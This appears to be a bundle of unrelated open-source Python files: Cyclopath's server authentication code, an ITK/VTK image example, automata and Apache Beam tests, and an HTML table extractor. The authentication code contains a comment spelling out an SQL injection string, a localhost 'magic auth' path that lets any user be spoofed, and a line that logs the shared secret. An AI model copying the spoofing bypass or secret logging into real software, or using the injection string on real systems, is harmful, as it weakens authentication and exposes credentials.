return found_row
#
def user_token_verify_(self, found_row, token, username, lock_acquired):
token_ok = False
if found_row['username'] != username:
self.req.db.transaction_rollback()
log.error('user_token_verify_: tkn: %s / row[0][u]: %s / usrnm: %s'
% (token, found_row['username'], username,))
raise GWIS_Error('%s %s'
% ('Token found but username does not match.',
'Please log out and log on again.',))
# Token ok! Update the count, if we can.
# BUG nnnn: When the server is busy, especially during the nightly
# cron, since each user and each script generates lots of requests,
# oftentimes psql timesout trying to lock the user__token row for
# update (after trying for 4 secs., e.g.). Fortunately, the
# usage_count is not an important value, so it can underrepresent
      # its true value.
# EXPLAIN: Each request only locks user__token briefly at the start
# of each request, but releases it soon after. So why are
# we timing out??
# Here's a snippet from the production server: note the big time gap
# between log messages:
# 03:56:38 util_.db_glue # Thd 2 # lck_row_lgc: locking user__token...
# 03:56:42 gwis.request # Thd 1 # areq_send_resp: sent 70 gwis bytes.
# 03:56:42 util_.db_glue # Thd 2 # sql: query canceled:
# canceling statement due to statement timeout
#
if lock_acquired:
update_sql = (
"""
UPDATE user__token
SET usage_count = usage_count + 1
WHERE date_expired IS NULL
AND user_token = %s
""")
update_row = self.req.db.sql(update_sql, (token,))
g.assurt(update_row is None)
# BUG 2688: Use transaction_retryable?
self.req.db.transaction_commit()
log.info('user_validate: token and lock: %s / %s / new cnt >=: %s'
% (username,
self.str_remote_ip_and_host_and_local_host(),
found_row['usage_count'] + 1,))
else:
log.info('user_validate: token w/o lock: %s / %s / old cnt: %s'
% (username,
self.str_remote_ip_and_host_and_local_host(),
found_row['usage_count'],))
token_ok = True
return token_ok
#
def user_validate_maybe(self, variant=None):
if self.username is None:
self.user_validate(variant)
#
def user_validate(self, variant=None):
'''
Check the username and password/token included in the GWIS request.
- If not provided set self.username to anonymous username
- If provided and valid set self.username to validated username
- If provided and invalid raise GWIS_Error.
'''
log.verbose1('user_validate: variant: %s' % (str(variant),))
user = None
if self.req.doc_in is not None:
user = self.req.doc_in.find('metadata/user')
if user is None:
# No auth data; set username to the anonymous user
log.info('user_validate: anon: %s / %s'
% (conf.anonymous_username,
self.str_remote_ip_and_host_and_local_host(),))
self.username = conf.anonymous_username
self.user_group_id = User.private_group_id(self.req.db,
conf.anonymous_username)
g.assurt(self.user_group_id > 0)
else:
# Parse and validate the username and credentials; raises on error.
self.user_validate_parse(user, variant)
if self.username is not None:
# Check user's access to branch. Raises GWIS_Error if access denied.
self.req.branch.branch_hier_enforce()
#
def user_validate_parse(self, user, variant):
'''
Called if the GWIS client includes a username. Here we verify the
username and password or token. The fcn. raises GWIS_Error if the
user cannot be authenticated.
'''
valid = False
username = user.get('name').lower()
password = user.get('pass')
sdsecret = user.get('ssec')
token = user.get('token')
g.assurt((password is None) or (token is None))
# NOTE: In CcpV1, route reactions adds save_anon. E.g.,
# # If save_anon is set, then perform the save as an anonymous user.
# save_anon = bool(int(self.decode_key('save_anon', False)))
# if save_anon:
# self.req.username = None
# but this is hopefully unnecessary. And it seems... wrong, like, we
# should set a bool that the user wants to save anonymously, otherwise
# none of the code will know there's a real user here (e.g., for tracing
# or storing stats).
# *** MAGIC AUTH
if ((conf.magic_localhost_auth)
and (self.ip_addr == conf.magic_auth_remoteip)):
# HACK: localhost can be whomever they like
# This is similar to the ccp script's --no-password, but this is used
# for spoofing another user via flashclient.
# Logs an Apache warning.
self.req.p_warning('user %s from localhost: magic auth' % (username,))
# Redundantly log a pyserver warning.
# FIXME: Do we really need to log Apache warnings at all?
log.warning('SPOOFING USER: %s from %s' % (username, self.ip_addr,))
# *** PASSWORD AUTH
elif variant == 'password':
if password:
r = self.req.db.sql("SELECT login_ok(%s, %s)",
(username, password,))
g.assurt(len(r) == 1)
if not r[0]['login_ok']:
self.auth_failure(username, 'password')
raise GWIS_Warning(
'Incorrect username and/or password.',
tag=None, logger=log.info)
elif not sdsecret:
raise GWIS_Warning(
'Please specify a password with that username.',
tag=None, logger=log.info)
log.info('user_validate: pwdd: %s / %s'
% (username,
self.str_remote_ip_and_host_and_local_host(),))
# FIXME: Statewide UI: Cleanup Session IDs records on login/logout.
# FIXME: Use cron job to mark date_expired where last_modified is
# some number of minutes old? flashclient log should keep
# token active, right?
# See the unimplemented: gwis/command_/user_goodbye.py
# 2014.09.09: The date_expired field in really old tokens
# is still NULL...
# *** TOKEN AUTH
elif variant == 'token':
log.verbose1('user_validate_parse: token: %s / username: %s'
% (token, username,))
if token is None:
log.warning('user_validate_parse: EXPLAIN: Why is the token None?')
raise GWIS_Warning('Token not found! Please login again.',
'badtoken')
# Avoid transaction_retryable, at least so long as it expects a
# specific TransactionRollbackError, but transaction_lock_row_logic
# simply raises Exception.
# success = self.req.db.transaction_retryable(
# self.user_token_verify, self.req, token, username)
# 2013.09.25: Using SELECT... FOR UPDATE NOWAIT seemed to work okay
# until [lb] started running runic's daily cron job and also a
# shapefile import script -- then all lock-rows came back failed.
# But the scripts aren't even touching that database or the
# user__token row! What gives?! I searched and couldn't find any
# indication that NOWAIT and FOR UPDATE do anything other than on
# the row on which they're suppose to behave... so this is truly
# strange. So now db_glue uses STATEMENT_TIMEOUT instead of NOWAIT.
found_row = self.user_token_verify(token, username)
if found_row is None:
log.info(
'user_validate_parse: timeout on token verify: username: %s'
% (username,))
raise GWIS_Warning(
'Please try your request again (server very busy).',
'sadtoken',
logger=log.info)
elif found_row is False:
log.warning(
'user_validate_parse: not found_row: token: %s / username: %s'
% (token, username,))
raise GWIS_Warning(
'Please log off and log back on (incorrect token).',
'badtoken')
# else, found_row is True
# EXPLAIN: Does p_notice write to Apache log? We're fine, because
# GWIS_Warning writes to the pyserver log... right?
#self.req.p_notice('tokens: %s %s' % (token, token_valid,))
if not self.token_ok:
# [lb] guessing this unreachable; would've raised exception by now.
log.debug('user_validate_parse: token not ok: %s' % (token,))
self.auth_failure(username, 'token')
raise GWIS_Warning(
'Please log off and log back on (incorrect token).',
'madtoken')
# *** MISSING AUTH
else:
# No match for variant.
log.warning('user_validate_parse: unknown variant: %s' % (variant,))
raise GWIS_Error('Unknown variant.', 'badvariant')
# *** SHARED SECRET
if sdsecret:
log.debug('user_validate_parse: using shared_secret to login')
if ( ('' == conf.gwis_shared_secret)
or (sdsecret != conf.gwis_shared_secret)
or (not self.request_is_local)):
log.error('Expected: %s / Got: %s / Local: %s'
% (conf.gwis_shared_secret, sdsecret, self.request_is_local,))
raise GWIS_Error('Whatchutalkinboutwillis?', 'badssec')
self.request_is_secret = True
# *** And The Rest.
# If we got and verified a token, the username was checked against what's
# in the db, so it should be clean. But if the username contains a quote
# in it, we want to make sure it's delimited properly.
# This is the simplest form of SQL injection: add a single quote and
# a true result and then terminate the statement, e.g., same username is:
# ' or 1=1;--
# E.g., SELECT * FROM user_ WHERE username='%s' AND password='%s';
# could be turned into, with, e.g., "fake_username' OR 1=1; --"
# SELECT * FROM user_
# WHERE username='fake_username' OR 1=1; -- AND password='%s';
# Of course, this is just a trivial example.
self.username = urllib.quote(username).strip("'")
if self.username != username:
raise GWIS_Warning('Bad username mismatch problem.',
'badquoteusername')
if self.req.areq is not None:
# Update Apache request_rec struct so username is recorded in logs.
self.req.areq.user = username
# Get the user ID
self.user_id = User.user_id_from_username(self.req.db, username)
g.assurt(self.user_id > 0)
# Get the user's private group ID
self.user_group_id = User.private_group_id(self.req.db, self.username)
g.assurt(self.user_group_id > 0)
# FIXME: We checked 'metadata/device' above, and now 'metadata/user' --
# which one is it?
# BUG nnnn: Don't rely on this value, since the client can spoof it.
if not self.request_is_mobile:
self.request_is_mobile = user.get('is_mobile', False)
# *** Private interface
#
def auth_failure(self, username, kind):
'''
Responds to an authentication failure.
'''
g.assurt(kind in ('password', 'token',))
# To make the sql calls easier, make a lookup
args = {
'username': username,
'is_password': (kind == 'password'),
'client_host': self.ip_addr,
'instance': conf.instance_name,
}
# We need a r/w transaction in order to record the failure
# BUG 2688: Use transaction_retryable?
self.req.db.transaction_commit()
self.req.db.transaction_begin_rw()
# Log the auth failure
# 2012.06.08: [lb] In CcpV1, I see 24 of these in a row for myself.
# What gives?
#
# EXPLAIN: The daily.runic.sh nightly cron will look at user login
# failures, and it'll complain/email if there are more than a certain
# amount per day per user.
# BUG nnnn: Do we need a better mechanism for detecting username attacks?
# Have we tested brute-force password attacks?
# What about other attacks....?
self.req.p_notice('auth failed for "%s" (%s)' % (username, kind))
log.info('auth_failure: username: %s / kind: %s' % (username, kind,))
self.auth_failure_log_event(args)
# Check if there have been too many recent failures
self.auth_failure_check_recent(kind, args)
# Commit now; we'll raise an exception shortly
# BUG 2688: Use transaction_retryable?
self.req.db.transaction_commit()
# Check if there have been too many recent failures
def auth_failure_check_recent(self, kind, args):
if (kind == 'password'):
limit_day = conf.auth_fail_day_limit_password
limit_hour = conf.auth_fail_hour_limit_password
else:
limit_day = conf.auth_fail_day_limit_token
limit_hour = conf.auth_fail_hour_limit_token
fail_ct_day = self.auth_failure_recent_fail_count(args, '1 day')
fail_ct_hour = self.auth_failure_recent_fail_count(args, '1 hour')
if ((fail_ct_day > limit_day)
or (fail_ct_hour > limit_hour)):
# over the limit - host is banned
self.req.p_warning('host banned - too many authentication failures!')
if (fail_ct_day > limit_day):
expires = "'infinity'"
else:
expires = "now() + '61 minutes'::interval"
self.auth_failure_mark_banned(args, expires)
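      # Illustrative outcome (limit value hypothetical): with
      # conf.auth_fail_hour_limit_password = 5, a sixth failed password
      # attempt from the same client_host within an hour inserts a ban row
      # expiring in 61 minutes; exceeding the daily limit instead bans the
      # host indefinitely ('infinity').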
#
def auth_failure_log_event(self, args):
self.req.db.sql(
"""
INSERT INTO auth_fail_event
(username,
client_host,
is_password,
instance)
VALUES
(%(username)s,
%(client_host)s,
%(is_password)s,
%(instance)s)
""", args)
#
def auth_failure_mark_banned(self, args, expires):
self.req.db.sql(
"""
INSERT INTO ban
(ip_address,
public_ban,
full_ban,
ban_all_gwis,
activated,
expires,
reason)
VALUES
(%%(client_host)s,
FALSE,
FALSE,
TRUE,
TRUE,
%s,
'Too many authentication failures')
""" % (expires,), args)
#
def auth_failure_recent_fail_count(self, args, interval):
# NOTE args is a dict w/ 'is_password' and 'client_host'
bans = self.req.db.sql(
"""
SELECT
count(*) AS count
FROM
auth_fail_event
WHERE
is_password = %%(is_password)s
AND NOT ignore
AND client_host = %%(client_host)s
AND created > (now() - '%s'::interval)
""" % (interval,), args)
return bans[0]['count']
# ***
# ***
| {
"content_hash": "d3a1ba4bd9fab6341c0d86d9f66db2a4",
"timestamp": "",
"source": "github",
"line_count": 838,
"max_line_length": 79,
"avg_line_length": 41.45107398568019,
"alnum_prop": 0.5589877936434823,
"repo_name": "lbouma/Cyclopath",
"id": "d37d67ec60187b8e2e50541398eaa8c7597e434c",
"size": "34848",
"binary": false,
"copies": "1",
"ref": "refs/heads/release",
"path": "pyserver/gwis/query_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ActionScript",
"bytes": "3369673"
},
{
"name": "ApacheConf",
"bytes": "46372"
},
{
"name": "C",
"bytes": "281248"
},
{
"name": "CSS",
"bytes": "36786"
},
{
"name": "Gnuplot",
"bytes": "14865"
},
{
"name": "HTML",
"bytes": "203213"
},
{
"name": "Java",
"bytes": "688800"
},
{
"name": "JavaScript",
"bytes": "60678"
},
{
"name": "M4",
"bytes": "35700"
},
{
"name": "Makefile",
"bytes": "8036"
},
{
"name": "PHP",
"bytes": "18399"
},
{
"name": "PLSQL",
"bytes": "451"
},
{
"name": "PLpgSQL",
"bytes": "1407944"
},
{
"name": "Perl",
"bytes": "669009"
},
{
"name": "Python",
"bytes": "5830046"
},
{
"name": "Shell",
"bytes": "639435"
}
],
"symlink_target": ""
} |
import sys
import itk
import vtk
if len(sys.argv) < 2:
print("Usage: " + sys.argv[0] + " <InputFileName>")
sys.exit(1)
imageFileName = sys.argv[1]
Dimension = 2
PixelType = itk.UC
ImageType = itk.Image[PixelType, Dimension]
reader = vtk.vtkPNGReader()
reader.SetFileName(imageFileName)
reader.SetDataScalarTypeToUnsignedChar()
magnitude = vtk.vtkImageMagnitude()
magnitude.SetInputConnection(reader.GetOutputPort())
magnitude.Update()
vtkToItkFilter = itk.VTKImageToImageFilter[ImageType].New()
vtkToItkFilter.SetInput(magnitude.GetOutput())
vtkToItkFilter.Update()
myitkImage = vtkToItkFilter.GetOutput()
print(myitkImage)
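# The reverse bridge exists as well (sketch; assumes the ITKVtkGlue module's
# standard Python wrapping, mirroring VTKImageToImageFilter above):
#
#   itkToVtkFilter = itk.ImageToVTKImageFilter[ImageType].New()
#   itkToVtkFilter.SetInput(myitkImage)
#   itkToVtkFilter.Update()
#   vtkImage = itkToVtkFilter.GetOutput()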
| {
"content_hash": "bd5af0af713d769f3fcd1834e6b7d431",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 59,
"avg_line_length": 23.62962962962963,
"alnum_prop": 0.7758620689655172,
"repo_name": "InsightSoftwareConsortium/ITKExamples",
"id": "dfce35f310387dcd04818146c2c45ff2968bf41c",
"size": "1236",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/Bridge/VtkGlue/ConvertvtkImageDataToAnitkImage/Code.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "1345317"
},
{
"name": "CMake",
"bytes": "468162"
},
{
"name": "CSS",
"bytes": "2087"
},
{
"name": "HTML",
"bytes": "8446"
},
{
"name": "JavaScript",
"bytes": "4743"
},
{
"name": "Python",
"bytes": "325825"
},
{
"name": "Shell",
"bytes": "37497"
}
],
"symlink_target": ""
} |
"""Classes and functions for testing the behavior of TMTapes."""
import unittest
from automata.tm.tape import TMTape
class TestTMTape(unittest.TestCase):
"""A test class for testing all Turing machines."""
def test_tape_copy(self):
"""Should copy TMTape."""
tape = TMTape('0011', blank_symbol='#', current_position=0)
new_tape = tape.copy()
self.assertIsNot(new_tape, tape)
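# A natural follow-up assertion (sketch; assumes TMTape exposes the values
# passed to its constructor as attributes, e.g. blank_symbol and
# current_position):
#
#    def test_tape_copy_preserves_configuration(self):
#        tape = TMTape('0011', blank_symbol='#', current_position=0)
#        new_tape = tape.copy()
#        self.assertEqual(new_tape.blank_symbol, tape.blank_symbol)
#        self.assertEqual(new_tape.current_position, tape.current_position)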
| {
"content_hash": "001bd5ab290181348c32db1e344377ec",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 67,
"avg_line_length": 27.933333333333334,
"alnum_prop": 0.6634844868735084,
"repo_name": "caleb531/automata",
"id": "7d1ed82a8477dc6c4e09cdf8c2204621d2c223f5",
"size": "442",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/test_tmtape.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "443681"
}
],
"symlink_target": ""
} |
"""End-to-end test for Bigquery tornadoes example."""
from __future__ import absolute_import
import logging
import time
import unittest
from builtins import round
from hamcrest.core.core.allof import all_of
from nose.plugins.attrib import attr
from apache_beam.examples.cookbook import bigquery_tornadoes
from apache_beam.io.gcp.tests import utils
from apache_beam.io.gcp.tests.bigquery_matcher import BigqueryMatcher
from apache_beam.testing.pipeline_verifiers import PipelineStateMatcher
from apache_beam.testing.test_pipeline import TestPipeline
class BigqueryTornadoesIT(unittest.TestCase):
# Enable nose tests running in parallel
_multiprocess_can_split_ = True
  # The default checksum is a SHA-1 hash generated from the sorted rows
  # read from the expected BigQuery table.
DEFAULT_CHECKSUM = 'd860e636050c559a16a791aff40d6ad809d4daf0'
@attr('IT')
def test_bigquery_tornadoes_it(self):
test_pipeline = TestPipeline(is_integration_test=True)
    # Set extra options on the pipeline for test purposes
project = test_pipeline.get_option('project')
dataset = 'BigQueryTornadoesIT'
table = 'monthly_tornadoes_%s' % int(round(time.time() * 1000))
output_table = '.'.join([dataset, table])
query = 'SELECT month, tornado_count FROM `%s`' % output_table
pipeline_verifiers = [PipelineStateMatcher(),
BigqueryMatcher(
project=project,
query=query,
checksum=self.DEFAULT_CHECKSUM)]
extra_opts = {'output': output_table,
'on_success_matcher': all_of(*pipeline_verifiers)}
# Register cleanup before pipeline execution.
# Note that actual execution happens in reverse order.
self.addCleanup(utils.delete_bq_table, project, dataset, table)
# Get pipeline options from command argument: --test-pipeline-options,
# and start pipeline job by calling pipeline main function.
bigquery_tornadoes.run(
test_pipeline.get_full_options_as_args(**extra_opts))
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
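# Invocation sketch (project and runner values hypothetical); the @attr('IT')
# marker above is selected via the nose attrib plugin, and the pipeline
# options are passed through the --test-pipeline-options flag referenced in
# the comments above:
#
#   nosetests -a IT apache_beam/examples/cookbook/bigquery_tornadoes_it_test.py \
#       --test-pipeline-options="--project=my-project --runner=TestDataflowRunner"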
| {
"content_hash": "261000063486479f3b7db59464326a18",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 75,
"avg_line_length": 35.26229508196721,
"alnum_prop": 0.703393770339377,
"repo_name": "markflyhigh/incubator-beam",
"id": "f7eb93ba609bbf5591b39e69a6b0522cfb94bc01",
"size": "2936",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sdks/python/apache_beam/examples/cookbook/bigquery_tornadoes_it_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "1596"
},
{
"name": "CSS",
"bytes": "40964"
},
{
"name": "Dockerfile",
"bytes": "22983"
},
{
"name": "FreeMarker",
"bytes": "7428"
},
{
"name": "Go",
"bytes": "2508482"
},
{
"name": "Groovy",
"bytes": "300669"
},
{
"name": "HTML",
"bytes": "54277"
},
{
"name": "Java",
"bytes": "24796055"
},
{
"name": "JavaScript",
"bytes": "16472"
},
{
"name": "Jupyter Notebook",
"bytes": "54182"
},
{
"name": "Python",
"bytes": "4544133"
},
{
"name": "Ruby",
"bytes": "4099"
},
{
"name": "Shell",
"bytes": "180209"
}
],
"symlink_target": ""
} |
from typing import List
from etk.extractor import Extractor, InputType
from etk.extraction import Extraction
from bs4 import BeautifulSoup
from bs4.element import Comment
import re
import copy
import pandas as pd
from zipfile import ZipFile
from requests import get
class Toolkit:
@staticmethod
def create_table_array(t, put_extractions=False):
rows = t['rows']
tt = []
max_cols = t['features']['max_cols_in_a_row']
for r in rows:
new_r = ['' for xx in range(max_cols)]
for i, c in enumerate(r['cells']):
text = c['text']
text = text.lower()
text = text.strip()
if put_extractions and 'data_extraction' in c:
data_extractions = c['data_extraction']
for key in data_extractions.keys():
text += ' DUMMY' + key.upper()
new_r[i] = text.strip()
tt.append(new_r)
return tt
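    # Illustrative result (input hypothetical): for a table whose only row
    # has cells "Name" and "Bob" and whose features report
    # max_cols_in_a_row == 3, create_table_array() returns
    # [['name', 'bob', '']] -- text lower-cased, stripped, and padded with
    # empty strings up to the widest row.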
@staticmethod
def regulize_cells(t):
for r in t:
for i in range(len(r)):
r[i] = re.sub('[0-9]', 'NUM', r[i])
# for x in re.findall('([0-9])', r[i]):
# int_x = int(x)
# if int_x < 5:
# r[i] = re.sub(x, 'SSSS', r[i])
# else:
# r[i] = re.sub(x, 'LLLL', r[i])
for x in re.findall('([a-z][a-z][a-z]+@)', r[i]):
r[i] = re.sub(x, 'EMAILNAME ', r[i])
@staticmethod
def clean_cells(t): # modifies t
for r in t:
for i in range(len(r)):
                r[i] = re.sub(r'[^\x00-\x7F]', ' ', r[i]) # remove non-ASCII characters
# r[i] = re.sub('[\'"]', '', r[i]) #remove annoying puncts
r[i] = re.sub('[^\s\w\.\-\$_%\^&*#~+@"\']', ' ', r[i]) #remove annoying puncts
for x in re.findall('(\.[a-z])', r[i]):
r[i] = re.sub('\.{0}'.format(x[1]), ' {0}'.format(x[1]), r[i])
r[i] = re.sub('\s+', ' ', r[i])
r[i] = r[i].strip()
class EntityTableDataExtraction(Extractor):
def __init__(self) -> None:
Extractor.__init__(self,
input_type=InputType.OBJECT,
category="data",
name="DigEntityTableDataExtractor")
self.glossaries = dict()
def add_glossary(self, glossary: List[str], attr_name: str) -> None:
"""
Adds a glossary for the given attribute name
:param glossary: a list of possible mentions of the attribute name
:param attr_name: the attribute name (field name)
"""
self.glossaries[attr_name] = glossary
def wrap_value_with_context(self, value: dict, field_name: str, start: int=0, end: int=0) -> Extraction:
"""Wraps the final result"""
return Extraction(value, self.name, start_token=start, end_token=end, tag=field_name)
def extract(self, table: dict) -> List[Extraction]:
"""
:param table: a table extracted by table extractor, as a json object
:return: list of all extractions from the input table
"""
if table['features']['max_cols_in_a_row'] != 2 and table['features']['no_of_rows'] < 2:
return []
results = list()
for row in table['rows']:
if len(row['cells']) != 2:
continue
text = [row['cells'][0]['text'], row['cells'][1]['text']]
for field_name in self.glossaries.keys():
if self.cell_matches_dict(text[0], self.glossaries[field_name]):
results.append(self.wrap_value_with_context(text[1], field_name))
if self.cell_matches_dict(text[1], self.glossaries[field_name]):
results.append(self.wrap_value_with_context(text[0], field_name))
return results
def cell_matches_dict(self, cell_text: str, glossary: List[str]) -> bool:
if any([self.cell_matches_text(cell_text, x) for x in glossary]):
return True
return False
def cell_matches_text(self, cell_text: str, text: str) -> bool:
cell_text = cell_text.lower()
text = text.lower()
if text in cell_text and float(len(cell_text))/float(len(text)) < 1.5:
return True
return False
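    # Illustrative match: cell text "Phone:" against glossary entry "phone"
    # matches ("phone" is a substring after lower-casing, and 6 / 5 = 1.2 is
    # below the 1.5 length-ratio cap), whereas "phone numbers listed below"
    # is rejected by the ratio guard despite containing the substring.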
class TableExtraction:
@staticmethod
def is_data_cell(cell):
if cell.table:
return False
return True
@staticmethod
def is_data_row(row):
if row.table:
return False
cell = row.findAll('th', recursive=False)
cell.extend(row.findAll('td', recursive=False))
for td in cell:
if TableExtraction.is_data_cell(td) == False:
return False
return True
@staticmethod
def get_data_rows(table):
data_rows = []
rows = table.findAll('tr', recursive=False)
if table.thead:
rows.extend(table.thead.findAll('tr', recursive=False))
if table.tbody:
rows.extend(table.tbody.findAll('tr', recursive=False))
for tr in rows:
if TableExtraction.is_data_row(tr):
data_rows.append(tr)
return data_rows
@staticmethod
def is_data_table(table, k):
rows = TableExtraction.get_data_rows(table)
if len(rows) > k:
return rows
else:
return False
@staticmethod
def mean(numbers):
""" Computes mean of a list of numbers """
return float(sum(numbers)) / max(len(numbers), 1)
@staticmethod
def _ss(data):
"""Return sum of square deviations of sequence data."""
c = TableExtraction.mean(data)
ss = sum((x-c)**2 for x in data)
return ss
@staticmethod
def pstdev(data):
"""Calculates the population standard deviation."""
n = len(data)
if n < 2:
return 0
# raise ValueError('variance requires at least two data points')
ss = TableExtraction._ss(data)
pvar = ss/n # the population variance
return pvar**0.5
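    # Worked example: for data = [2, 4, 4, 4, 5, 5, 7, 9] the mean is 5, the
    # sum of squared deviations is 32, the population variance is 32/8 = 4,
    # and pstdev() returns 4 ** 0.5 == 2.0.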
@staticmethod
# Check if a string contains a digit
def contains_digits(d):
_digits = re.compile('\d')
return bool(_digits.search(d))
@staticmethod
def gen_context(seq):
seen = set()
seen_add = seen.add
uniq_list = [x for x in seq if not (x in seen or seen_add(x))]
if len(uniq_list) > 5:
uniq_list = uniq_list[:5]
uniq_list = [x.replace("\t", "").replace("\r", "").replace("\n", "").strip() for x in uniq_list]
if '' in uniq_list:
uniq_list.remove('')
if ' ' in uniq_list:
uniq_list.remove(' ')
return uniq_list
@staticmethod
def convert_to_csv(jobj, outpath):
with ZipFile(outpath, 'w') as myzip:
for ti, t in enumerate(jobj['tables']):
with myzip.open(f't{ti}.csv', 'w') as myfile:
tarr = [[c['text'] if c is not None else '' for c in r['cells']] for r in t['rows']]
csv = pd.DataFrame(tarr).to_csv(index=False, header=False)
myfile.write(csv.encode('utf-8'))
myfile.close()
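    # Illustrative call (path hypothetical): convert_to_csv(result, 'tables.zip')
    # writes one CSV per extracted table (t0.csv, t1.csv, ...) into the zip,
    # where `result` is the json object produced by extract_html() below.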
@staticmethod
def extract(input_data, expand_merged_cells=False,
input_format='html', output_format='json',
min_data_rows=1, output_path=None):
"""extract tables from input data.
Args:
input_data (str): input url/html.
expand_merged_cells (bool): replicate the value of merged cells.
input_format (str): the form of input data, {html, pdf}
output_format (str): output format, {json, csv}
min_data_rows (int): minimum number of rows for data tables.
output_path (str): path to output file if output format is csv.
Returns:
bool: json object if output_format is json, None otherwise.
Examples:
>>> url = 'https://en.wikipedia.org/wiki/United_States'
>>> html = requests.get(url).text
>>> te = TableExtraction()
>>> res = te.extract(html, expand_merged_cells=False,
output_format='csv', output_path='test.zip')
>>> res = te.extract(html)['tables'][0]['text']
United States of America | \nFlag Coat of arms | \nMot ....
>>> url = 'https://www.imf.org/~/media/Files/Publications/WP/wp1715.ashx'
>>> te.extract(url, input_format='pdf',
expand_merged_cells=False, output_format='csv',
output_path='test.csv')
"""
if input_format == 'html':
json_output = TableExtraction.extract_html(input_data, expand_merged_cells, min_data_rows)
if output_format == 'json':
return json_output
elif output_format == 'csv':
return TableExtraction.convert_to_csv(json_output, output_path)
elif input_format == 'pdf':
import tabula
res = get(input_data)
with open(output_path+".pdf", 'wb') as tempfile:
tempfile.write(res.content)
tempfile.close()
tabula.convert_into(output_path+".pdf", output_path, output_format="zip", pages='all')
@staticmethod
def extract_html(html_doc, expand_merged_cells, min_data_rows=1):
soup = BeautifulSoup(html_doc, 'html5lib')
result_tables = list()
tables = soup.findAll('table')
for table_i, table in enumerate(tables):
tdcount = 0
max_tdcount = 0
img_count = 0
href_count = 0
inp_count = 0
sel_count = 0
colspan_count = 0
colon_count = 0
len_row = 0
table_data = ""
data_table = dict()
row_list = list()
rows = TableExtraction.is_data_table(table, min_data_rows)
if rows != False:
features = dict()
row_len_list = list()
avg_cell_len = 0
avg_row_len_dev = 0
num_rows = 0
num_cols = 0
max_cols = 0
row_shift = 0
                ## detect merged cells and find table dimension
merged_cells = []
row_spans = dict()
for ri, row in enumerate(rows):
rshift = 0
num_rows += 1
num_cols = 0
col_shift = 0
ci = 0
for ci, c in enumerate(row.findAll(['td', 'th'])):
num_cols += 1
ci += col_shift+rshift
# shift the col index if there are any spanning cells above it
while ci in row_spans:
if row_spans[ci] <= 0:
del row_spans[ci]
else:
rshift += 1
row_spans[ci] -= 1
ci += 1
cspan = c.get('colspan')
rspan = c.get('rowspan')
# record spanned cell for later use
if cspan is not None and rspan is not None:
cspan = int(cspan)
rspan = int(rspan)
col_shift += cspan-1
for ii in range(ci, ci+cspan):
row_spans[ii] = rspan-1
merged_cells.append((ri, ri+rspan, ci, ci+cspan))
elif cspan is not None:
cspan = int(cspan)
col_shift += cspan-1
merged_cells.append((ri, ri+1, ci, ci+cspan))
elif rspan is not None:
rspan = int(rspan)
row_spans[ci] = rspan-1
merged_cells.append((ri, ri+rspan, ci, ci+1))
if max_cols < num_cols:
max_cols = num_cols
# update rowspan dict for columns not seen in this iteration
for k, v in row_spans.items():
if k > ci:
row_spans[k] -= 1
if len(merged_cells) > 0:
max_cols = max(max_cols, max([x[3] for x in merged_cells]))
num_rows = max(len(rows), max([x[1] for x in merged_cells]))
else:
num_rows = len(rows)
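                ## Each merged_cells entry is a half-open region
                ## (row_start, row_end, col_start, col_end); e.g. a cell at
                ## row 0, col 0 with colspan=2 and rowspan=2 is recorded as
                ## (0, 2, 0, 2) and is replicated below when
                ## expand_merged_cells is set.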
## create table array
row_spans = dict()
for ri, row in enumerate(rows):
row_data = ' '.join(row.stripped_strings)
row_data = row_data.replace("\\t", "").replace("\\r", "").replace("\\n", "")
row_len_list.append(len(row_data))
row_tdcount = len(row.findAll('td')) + len(row.findAll('th'))
if row_tdcount > max_tdcount:
max_tdcount = row_tdcount
tdcount += row_tdcount
img_count += len(row.findAll('img'))
href_count += len(row.findAll('a'))
inp_count += len(row.findAll('input'))
sel_count += len(row.findAll('select'))
colspan_count += row_data.count("colspan")
colon_count += row_data.count(":")
len_row += 1
table_data += str(row)
row_dict = dict()
newr = [None]*max_cols
shift = 0
rshift = 0
ci = 0
for i, c in enumerate(row.findAll(['td', 'th'])):
ci = i+shift+rshift
while ci in row_spans:
if row_spans[ci] <= 0:
del row_spans[ci]
else:
rshift += 1
row_spans[ci] -= 1
ci += 1
for br in c.find_all("br"):
br.replace_with(" ")
for br in c.find_all("script"):
br.decompose()
cell_dict = dict()
cell_dict["cell"] = str(c)
cell_dict["text"] = ' '.join(c.stripped_strings)
cell_dict["id"] = 'row_{0}_col_{1}'.format(ri, ci)
avg_cell_len += len(cell_dict["text"])
newr[ci] = cell_dict
cspan = c.get('colspan')
rspan = c.get('rowspan')
if cspan is not None and rspan is not None:
cspan = int(cspan)
rspan = int(rspan)
shift += cspan-1
for ii in range(ci, ci+cspan):
row_spans[ii] = rspan-1
elif rspan is not None:
rspan = int(rspan)
row_spans[ci] = rspan-1
elif cspan is not None:
cspan = int(cspan)
shift += cspan-1
for i in range(ci+1, max_cols):
if i in row_spans:
row_spans[i] -= 1
avg_row_len_dev += TableExtraction.pstdev([len(x["text"]) if x else 0 for x in newr])
row_dict["cells"] = newr
row_dict["text"] = TableExtraction.row_to_text(newr)
row_dict["html"] = TableExtraction.row_to_html(newr)
row_dict["id"] = "row_{}".format(ri)
row_list.append(row_dict)
if expand_merged_cells:
# replicate merged cells
N = len(row_list)
M = max_cols
for m in merged_cells:
if row_list[m[0]]['cells'][m[2]] is None:
print(m)
for ii in range(m[0], min(m[1], N)):
for jj in range(m[2], min(m[3], M)):
if ii == m[0] and jj == m[2]:
continue
row_list[ii]['cells'][jj] = copy.deepcopy(row_list[m[0]]['cells'][m[2]])
row_list[ii]['cells'][jj]['id'] += '_span_row{}_col{}'.format(ii,jj)
# To avoid division by zero
if len_row == 0:
tdcount = 1
features['merged_cells'] = merged_cells
features["no_of_rows"] = len_row
features["no_of_cells"] = tdcount
features["max_cols_in_a_row"] = max_tdcount
